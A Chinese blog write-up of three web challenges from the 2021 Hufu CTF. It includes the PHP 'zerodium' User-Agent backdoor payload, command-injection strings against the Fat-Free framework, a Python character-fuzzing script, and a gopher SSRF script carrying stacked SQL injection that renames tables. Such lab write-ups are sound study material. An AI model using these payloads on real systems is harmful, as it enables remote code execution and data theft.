2021虎符杯web(部分)

最新推荐文章于 2022-03-25 16:40:58 发布
置顶 最新推荐文章于 2022-03-25 16:40:58 发布
阅读量2.2k 收藏 4
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/115413983
版权

签到

根据提示直接在网上搜新闻。
在这里插入图片描述

这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。

也就是说zerodiumsystem将会有system函数的功能。
payload:
在这里插入图片描述

在这里插入图片描述

unsetme

在网站上下载下来源码,修改index.php后本地搭建。
开启报错后爆出关键内容
在这里插入图片描述
找到代码位置
在这里插入图片描述
其中$key为我们传入的a的内容.
过程是unset触发__unset 接着进入offsetunset 最后进入clear函数。
在这里插入图片描述
在这里插入图片描述

现在的目的就是绕过函数。
在这里插入图片描述
懒得分析了,直接测试几个常见的。打印一下输出

在这里插入图片描述
直接跑一遍字符

import requests
from urllib.parse import quote

url="http://127.0.0.1/fatfree/index.php?a="
for i in range(128):
	if("1))"  in requests.get(url+"1"+quote(chr(i))+"1)").text):
		print(quote(chr(i)))
输出
%0A
%5B
%5D

也就是说%0a 、 [ 、]
直接随便拿一个就可以绕过了。
在这里插入图片描述
payload1
a=1[1]);system('cat /f*');//
payload2
a=1%0a);system('cat /f*');//

慢慢做管理系统

根据提示直接扔密码

ffifdyop
129581926211651571912466741651878684928

发现第二个可以用
进入gopher页面
在这里插入图片描述
过滤了file http://,看来就是想让我们用gopher了。
构造ssrf的payload

import requests
from urllib.parse import quote
cmd="username=1'||1#&password=123"
url="http://eci-2zecqhthq774sc0sy6u0.cloudeci1.ichunqiu.com/"
sess=requests.session()
r1=sess.get(url+'?password=129581926211651571912466741651878684928')
data='''POST /admin.php HTTP/1.1
Host: eci-2zecqhthq774sc0sy6u0.cloudeci1.ichunqiu.com
Content-Type:application/x-www-form-urlencoded
Content-Length: '''+str(len(cmd))+'''

'''+cmd+'''

'''
data=quote(data)
data=data.replace('%0a','%0d%0a')
print(url+"/ssrf.php?way=gopher://127.0.0.1:80/_"+quote(data))
r2=sess.get(url+"/ssrf.php?way=gopher://127.0.0.1:80/_"+quote(data))
print(r2.text)

在这里插入图片描述
经过尝试发现过滤了select等关键字,然后发现可以堆叠注入,直接show tables 看下。
在这里插入图片描述

说明我们要的用户名密码再第二个表里面,但是查询的是第一个。
类似于19年强网杯的随便注。直接修改表名。

cmd="username=1'||1;rename table `fake_admin` to `a`;rename table `real_admin_here_do_you_find` to `fake_admin`;;#&password=password"

接着直接一句话查出来真正的用户名密码
cmd="username=1'||1#&password=password"
在这里插入图片描述
得到用户名密码,然后怎么也进不去flag.php
把admin_inner改成admin就可以了。。。。。。。。。。。。。。。。
在这里插入图片描述

cmd="username=admin&password=5fb4e07de914cfc82afb44vbaf402203"

在这里插入图片描述
修改cookie直接访问flag.php就可以了
在这里插入图片描述

yu22x
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
PHP zerodium后门漏洞
good good study
05-18 6848
目录 一. 漏洞概述 二. 漏洞影响 三. 漏洞复现 一. 漏洞概述 PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。 目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitH
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4828
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
2021虎符CTF-Web前三题
Y4tacker的博客
04-04 1524
文章目录web签到unset慢慢做管理系统 web 签到 一个最近刚爆出来的php后门,直接一把梭 User-Agentt: zerodiumsystem("cat /flag"); unset 一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻 syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.ph
Linux下使用system()函数(一定要谨慎)
weixin_49356927的博客
11-11 1158
函数原型 包含在头文件 “stdlib.h” 中 int system(const char *command); 函数功能 执行 dos(windows系统) 或 shell(Linux/Unix系统) 命令,参数字符串command为命令名。另,在windows系统下参数字符串不区分大小写。 说明:在windows系统中,system函数直接在控制台调用一个command命令。 在Linux/Unix系统中,system函数会调用fork函数产生子进程,由子进程来执行command命令,命令执行完后
揭秘“0 day漏洞”:一款强大却脆弱的武器
systemino的博客
05-24 504
所谓“0 day漏洞”就是尚未被供应商修复的安全漏洞,且这些漏洞可被恶意行为者滥用并转化为一款威力强大但却脆弱的攻击武器。近年来,越来越多的证据显示,各国政府正在购买和使用0 day漏洞用于军事、情报和执法目的——当然,这是一种极具争议的做法,因为这会导致社会无力抵御发现了相同漏洞的其他攻击者。 在黑市上,0 day漏洞属于高价商品,但有漏洞悬赏项目鼓励安全人员发现并向供应商报告这些安全漏洞。修...
虎符科技网络安全通信服务三种解决方案推选PPT文档.ppt
10-27
同时,兼容普通电话,即使在没有定制硬件的情况下,也能确保部分线路的安全性。 综上所述,虎符科技的网络安全通信服务解决方案是针对现有网络安全挑战的一次创新尝试,旨在通过先进的标识认证技术和安全通信服务...
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的.pdf
09-18
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的 安全管理 安全意识教育 端点安全 数据分析 云安全
高中历史之图说历史秦杜虎符:中华现存最早调兵凭证素材
09-09
高中历史之图说历史秦杜虎符:中华现存最早调兵凭证素材
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static.zip
最新发布
04-22
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static
HFCTF2021复现
as you know, nlp is fantasitc!
03-16 1148
[HFCTF2021 Quals]Unsetme 1、F3框架,unset将参数a拼接进去,可以闭合 2、测试 ​ payload ?a=a%0a);%0aphpinfo( 3、读取flag ?a=a%0a);%0aecho file_get_contents(%27/flag%27 [HFCTF 2021 Final]easyflask 1、源码,很明显的pickle反序列化 pickle官方文档 #!/usr/bin/python3.6 import os import pickle fro
2021虎符初赛Web部分题解
feng的博客
04-05 1440
前言 这个WP还是直接复制粘贴的当时随手写的WP。。。太懒了别骂了呜呜呜。。。 签到 几天前PHP的那个后门,当时笑死我了的那个User-Agentt。 User-Agentt: zerodiumsystem("cat /flag"); unsetme fatfree框架,搜一下有一个漏洞符合,即3.7.1的代码注入,但是题目打不通,怀疑是因为版本的问题,下载3.7.3的fatfree看一下,主要是这部分: $val=preg_replace('/^(\$hive)/','$this->hive',
虎符网络安全 pwn count wp
weixin_44740530的博客
04-19 548
List item
2020数字中国创新大赛虎符网络安全赛RE——game WP
辰星的博客
04-21 756
阅读字节码后,首先定义了三个列表,arr0,arr1,arr2。 主函数逻辑大致如下(伪代码形式给出): 获取输入,然后依次调用4个check函数对输入进行check,如果其中任何一个不通过,返回失败。 分别查阅4个check函数。4个函数翻译过后,整理出其关键运算处(用伪代码形式),推测出其作用。 check0:字符ASCII值必须在32~127即可打印字符 check1:长度校验,可以爆破得f...
2021虎符CTF逆向WP
Whitebird的博客
04-06 1052
周六打了2021虎符的比赛,由于刚入门逆向,也就写出来了一题,赛后复现了一波,可能会有写错的地方,欢迎大佬指出。 一、redemption_code二、CrackMe三、GoEncrypt 一、redemption_code 首先,拿到这道题,我们查一下壳,并没有加壳。然后拉入ida32查看一下 看了下大概的流程,写了点注释,接下来我们的重点就是pre(v11);和server_check_redemption_code 两个函数 对pre函数写了点注释,我们看到pre的函数和main函数都有ser
2021虎符ctf-逆向题解
qq_37439229的博客
04-04 3016
red… mips架构,nmsl GoEncrypt 输入符合正则格式的flag:flag{11111111-1111-1111-1111-111111111111}, 除了”-“的其他hex编码 ,之后分成2组 xtea,脚本 抄百度就行 #include<stdio.h> #include<stdlib.h> #define uint32_t unsigned int void encipher(unsigned int num_rounds, uint32_t v[2], ui
2021虎符ctf crypto 密码学WP
blog
04-07 1198
看懂曲线变化的原理就比较简单了 基本上算学妹做出来的,tql link wiki 这里整理一个通解公式来把玩 n = 6 a = (4*n ^ 2+12*n-3) b = 32*(n+3) ee = EllipticCurve([0, a, 0, b, 0]) # y2=x3+109x2+224x def orig(P, N): x = P[0] y = P[1] a = (8*(N+3)-x+y)/(2*(N+3)*(4-x)) b = (8*(N+3)-x-y)/(
虎符ctf wp
haiyang19的博客
03-25 1410
虎符ctf wp by BOI战队 WEB ezsql 绕过空格和函数利用状态码进行布尔盲注 利用mysql8特性collate关键字区分大小写 import requests url = "http://47.107.231.226:31042/login" proxy = {"http": "http://127.0.0.1:8080"} string = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890^!$" #s

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值